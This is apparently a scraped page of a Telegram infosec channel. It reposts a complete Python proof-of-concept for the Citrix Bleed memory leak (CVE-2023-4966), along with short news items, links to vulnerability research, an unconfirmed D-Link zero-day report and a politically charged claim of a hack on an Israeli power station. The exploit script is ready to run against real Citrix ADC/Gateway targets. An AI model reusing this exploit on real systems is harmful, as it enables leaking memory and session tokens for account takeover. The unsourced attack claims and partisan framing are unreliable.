cKure Red
2.39K subscribers
70 photos
34 videos
21 files
449 links
The director's cut on critical feeds from InfoSec world 🌎

Main Channel: @cKure

☕️ or queries email us
📨 i@ckure.org
Download Telegram
Citrix Bleed Zero-Day CVE-2023-4966 by AssetNote team.

#!/usr/bin/env python3

import sys
import requests
import urllib3
import argparse
urllib3.disable_warnings(urllib3.exceptions.InsecureRequestWarning)

parser = argparse.ArgumentParser()
parser.add_argument('--target', help='The Citrix ADC / Gateway target, excluding the protocol (e.g.
192.168.1.200)')
args = parser.parse_args()

if
args.target is None:
print('Target must be provided (e.g. --target
192.168.1.200)')
sys.exit(0)

hostname =
args.target

if name == "main":
headers = {
"Host": "a"*24576
}
r = requests.get(f"https://{hostname}/oauth/idp/.well-known/openid-configuration", headers=headers, verify=False,timeout=10)
if r.status_code == 200:
print("--- Dumped Memory ---")
print(r.text[131050:])
print("--- End ---")
else:
print("Could not dump memory")
A series of critical zero-day vulnerabilities (approximately 3 issues) have been detected by a security researcher in D-Link devices / CPEs.

As per reports; most or all devices are vulnerable and system access can be achieved.

@ckuRED could not confirm independently.
cKure Red pinned «● A series of critical zero-day vulnerabilities (approximately 3 issues) have been detected by a security researcher in D-Link devices / CPEs. As per reports; most or all devices are vulnerable and system access can be achieved. @ckuRED could not confirm…»
Bypassing Wi-Fi Encryption by Manipulating Transmit Queues.

https://www.usenix.org/system/files/usenixsecurity23-schepers.pdf
cKure Red pinned «Zero-Day (via CVE-2023-45866): Exploiting Zero-click Android Bluetooth vulnerability to inject keystrokes without pairing. https://www.mobile-hacker.com/2024/01/23/exploiting-0-click-android-bluetooth-vulnerability-to-inject-keystrokes-without-pairing/»
BurpSuite's chromium browser adds a header as it sends the request across to the server.

Sec-Ua*

I found it when one website blocked my requests for a normal login (with a 302 redirect to WAF's soft error). This is over a half year old story. Thought of sharing.
Channel photo updated
Interesting thread on Azure vulnerability to take over Bing search results.

https://twitter.com/hillai/status/1641146508639600646
Major cyber-attack on Israel 🇮🇱 by pro-Pslestine hacker groups amid ongoing extermination cum genocide of Muslims ☪️ and Christians ✝️ in Gaza and West-Bank Palestine 🇵🇸 by Israel.

The Eilat power station is pwned and apparently electricity in some areas has been affected by this ICS-SCADA hack.